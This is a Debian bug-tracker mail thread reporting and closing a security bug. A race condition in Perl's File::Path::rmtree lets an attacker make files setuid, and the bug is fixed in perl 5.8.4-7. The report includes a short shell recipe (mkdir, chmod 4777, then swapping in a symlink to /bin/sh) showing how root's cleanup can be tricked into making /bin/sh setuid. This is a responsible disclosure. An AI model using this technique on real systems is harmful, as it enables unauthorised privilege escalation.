Your message dated Mon, 07 Mar 2005 01:47:15 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#286905: fixed in perl 5.8.4-7
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 22 Dec 2004 22:11:05 +0000
>From [EMAIL PROTECTED] Wed Dec 22 14:11:05 2004
Return-path: <[EMAIL PROTECTED]>
Received: from talus.maths.usyd.edu.au [129.78.68.1]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1ChEhE-00048l-00; Wed, 22 Dec 2004 14:11:04 -0800
Received: from pisa.maths.usyd.edu.au ([EMAIL PROTECTED]) [129.78.69.136]
by siv.maths.usyd.edu.au via smtpdoor V18.4
id 309156 for [EMAIL PROTECTED]; Thu, 23 Dec 2004 09:10:31 +1100
Message-Id: <[EMAIL PROTECTED]>
Received: from [EMAIL PROTECTED] by pisa.maths.usyd.edu.au (8.12.3/8.1/Submit)
id iBMMAV7n010381; Thu, 23 Dec 2004 09:10:31 +1100
From: Paul Szabo <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: perl-modules: File::Path::rmtree makes setuid
X-Mailer: reportbug 1.50
Date: Thu, 23 Dec 2004 09:10:31 +1100
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-5.9 required=4.0 tests=BAYES_00,HAS_PACKAGE,
MSGID_FROM_MTA_HEADER,WEIRD_PORT autolearn=no
version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level:
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
170 (undef, undef, my $rp) = lstat $root or next;
171 $rp &= 07777; # don't forget setuid, setgid, sticky bits
172 if ( -d _ ) {
...
209 if (rmdir $root) {
210 ++$count;
211 }
212 else {
213 carp "Can't remove directory $root: $!";
214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) :
$root))
215 or carp("and can't restore permissions to "
216 . sprintf("0%o",$rp) . "\n");
217 }
218 }
...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir -p /tmp/psz/sh
perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
mv /tmp/psz/sh /tmp/psz/dummy
ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED]
and [EMAIL PROTECTED]; Tim.Bunce bounced.)
Cheers,
Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
---------------------------------------
Received: (at 286905-close) by bugs.debian.org; 7 Mar 2005 06:53:04 +0000
>From [EMAIL PROTECTED] Sun Mar 06 22:53:04 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1D8C6y-0000XC-00; Sun, 06 Mar 2005 22:53:04 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1D8C1L-0001OJ-00; Mon, 07 Mar 2005 01:47:15 -0500
From: Brendan O'Dea <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#286905: fixed in perl 5.8.4-7
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Mon, 07 Mar 2005 01:47:15 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 11
Source: perl
Source-Version: 5.8.4-7
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive:
libcgi-fast-perl_5.8.4-7_all.deb
to pool/main/p/perl/libcgi-fast-perl_5.8.4-7_all.deb
libperl-dev_5.8.4-7_i386.deb
to pool/main/p/perl/libperl-dev_5.8.4-7_i386.deb
libperl-dev_5.8.4-7_powerpc.deb
to pool/main/p/perl/libperl-dev_5.8.4-7_powerpc.deb
libperl-dev_5.8.4-7_sparc.deb
to pool/main/p/perl/libperl-dev_5.8.4-7_sparc.deb
libperl5.8_5.8.4-7_i386.deb
to pool/main/p/perl/libperl5.8_5.8.4-7_i386.deb
libperl5.8_5.8.4-7_powerpc.deb
to pool/main/p/perl/libperl5.8_5.8.4-7_powerpc.deb
libperl5.8_5.8.4-7_sparc.deb
to pool/main/p/perl/libperl5.8_5.8.4-7_sparc.deb
perl-base_5.8.4-7_i386.deb
to pool/main/p/perl/perl-base_5.8.4-7_i386.deb
perl-base_5.8.4-7_powerpc.deb
to pool/main/p/perl/perl-base_5.8.4-7_powerpc.deb
perl-base_5.8.4-7_sparc.deb
to pool/main/p/perl/perl-base_5.8.4-7_sparc.deb
perl-debug_5.8.4-7_i386.deb
to pool/main/p/perl/perl-debug_5.8.4-7_i386.deb
perl-debug_5.8.4-7_powerpc.deb
to pool/main/p/perl/perl-debug_5.8.4-7_powerpc.deb
perl-debug_5.8.4-7_sparc.deb
to pool/main/p/perl/perl-debug_5.8.4-7_sparc.deb
perl-doc_5.8.4-7_all.deb
to pool/main/p/perl/perl-doc_5.8.4-7_all.deb
perl-modules_5.8.4-7_all.deb
to pool/main/p/perl/perl-modules_5.8.4-7_all.deb
perl-suid_5.8.4-7_i386.deb
to pool/main/p/perl/perl-suid_5.8.4-7_i386.deb
perl-suid_5.8.4-7_powerpc.deb
to pool/main/p/perl/perl-suid_5.8.4-7_powerpc.deb
perl-suid_5.8.4-7_sparc.deb
to pool/main/p/perl/perl-suid_5.8.4-7_sparc.deb
perl_5.8.4-7.diff.gz
to pool/main/p/perl/perl_5.8.4-7.diff.gz
perl_5.8.4-7.dsc
to pool/main/p/perl/perl_5.8.4-7.dsc
perl_5.8.4-7_i386.deb
to pool/main/p/perl/perl_5.8.4-7_i386.deb
perl_5.8.4-7_powerpc.deb
to pool/main/p/perl/perl_5.8.4-7_powerpc.deb
perl_5.8.4-7_sparc.deb
to pool/main/p/perl/perl_5.8.4-7_sparc.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Brendan O'Dea <[EMAIL PROTECTED]> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Mon, 7 Mar 2005 10:22:01 +1100
Source: perl
Binary: perl-base libcgi-fast-perl libperl-dev perl-debug perl-modules perl
libperl5.8 perl-suid perl-doc
Architecture: all i386 powerpc source sparc
Version: 5.8.4-7
Distribution: unstable
Urgency: low
Maintainer: Brendan O'Dea <[EMAIL PROTECTED]>
Changed-By: Brendan O'Dea <[EMAIL PROTECTED]>
Description:
libperl-dev - Perl library: development files
libperl5.8 - Shared Perl library
perl - Larry Wall's Practical Extraction and Report Language
perl-base - The Pathologically Eclectic Rubbish Lister
perl-debug - Debug-enabled Perl interpreter
perl-suid - Runs setuid Perl scripts
Closes: 178243 198855 250877 255919 256731 263325 275142 281091 281092 281437
286905 286922 289709
Changes:
perl (5.8.4-7) unstable; urgency=low
.
* SECURITY [CAN-2005-0448]: rewrite File::Path::rmtree to avoid race
condition which allows an attacker with write permission on
directories in the tree being removed to make files setuid or to
remove arbitrary files (closes: #286905, #286922). Supersedes
the previous patch for CAN-2004-0452.
.
* Add PERL_DEBUGGING_MSTATS for debugperl (closes: #178243).
* Escape dashes in verbatim text to have groff render them as-is
rather than as \x{2010} (closes: #250877).
.
* CGI: handle escaped newlines in URLs (closes: #289709).
* Net::NNTP: fix precedence error in article routine (closes: #275142).
* Devel::Dprof: refer to executable as `perl' (closes: #198855).
* Remove spurious undefined warning in getopts.pl (closes: #255919).
* Remove XSI-isms from maintainer scripts (closes: #256731).
* Revise MakeMaker patch to defer expansion of $(MANnEXT) until
runtime (closes: #263325).
.
* Normalise case of a2p man page OPTIONS section, place optional
filename in brackets (closes: #281091, #281092).
.
* Fix octal glitch in perlreref(1) (closes: #281437).
* Have perl suggest both ReadLine variants (gnu, perl).
* Upgrade suggestion on perl-doc to recommends now that dselect is
less pedantic about the latter.
Files:
06d6c960bf7c8b7b7ce66e73bc689a86 3509162 perl standard perl_5.8.4-7_powerpc.deb
11a48c92fe6046185a1003394c28c1f9 7052380 doc optional perl-doc_5.8.4-7_all.deb
15d16eb40fc29280a13b901aa6f4d70a 775246 base required
perl-base_5.8.4-7_sparc.deb
2e89765c8eedf6af4fd3636a3922539c 3547364 perl standard perl_5.8.4-7_sparc.deb
3692cc87735524ef57ceeed24d60f686 567012 libdevel optional
libperl-dev_5.8.4-7_i386.deb
3aa29703d71dbb2fa5f9c4b8b8b203c7 624940 libdevel optional
libperl-dev_5.8.4-7_powerpc.deb
463e43a1c602f74a385bd414e5f752a8 3840696 perl optional
perl-debug_5.8.4-7_sparc.deb
4e7ab56ca74d59f1d98c3147a3a71138 3736402 perl optional
perl-debug_5.8.4-7_i386.deb
61d993933b3a08b0049462a802766220 31698 perl optional perl-suid_5.8.4-7_i386.deb
6b236605cdb5beb02219ad1f2bb198f8 1034 libs optional
libperl5.8_5.8.4-7_powerpc.deb
6dc36144aca73c10ec9f324117f3acde 38036 perl extra
libcgi-fast-perl_5.8.4-7_all.deb
c861bb89e40c2723b2ce9f0525b22e6b 726 perl standard perl_5.8.4-7.dsc
8347b722dbee125c18d631bf5ca474ac 31032 perl optional
perl-suid_5.8.4-7_sparc.deb
8d2973686564a7444c23847da092d840 3700708 perl optional
perl-debug_5.8.4-7_powerpc.deb
95e330d949521ee026a7148b4ca014d5 2178102 perl standard
perl-modules_5.8.4-7_all.deb
987b4cfbb284707e1f84f66a72232b5e 508830 libs optional
libperl5.8_5.8.4-7_i386.deb
9db0cfba5fc66c4a0c8279606a91bd94 1034 libs optional
libperl5.8_5.8.4-7_sparc.deb
9f4c86deaa8aa3f377d4ce8ccf3cda76 789658 base required
perl-base_5.8.4-7_powerpc.deb
ab32aebec33b748b0ccaf0e52cb77a69 582240 libdevel optional
libperl-dev_5.8.4-7_sparc.deb
bd4a96454f9a6b6dca5fcc54a24fe350 86680 perl standard perl_5.8.4-7.diff.gz
e4418c5838c05452631dbd1d561a2312 751654 base required
perl-base_5.8.4-7_i386.deb
e69b276f51914a16eb2d6ac5e09f4f96 33576 perl optional
perl-suid_5.8.4-7_powerpc.deb
fab241c803816d886180d671ac0334f2 3238062 perl standard perl_5.8.4-7_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
iD8DBQFCK/Y68NyOALKMWZURAuCYAKCxlPgMf40kHc1sF1iiHMOOiVA7AQCcCA/h
mpgXx7fsS2scjvHL021Ieto=
=8WTG
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
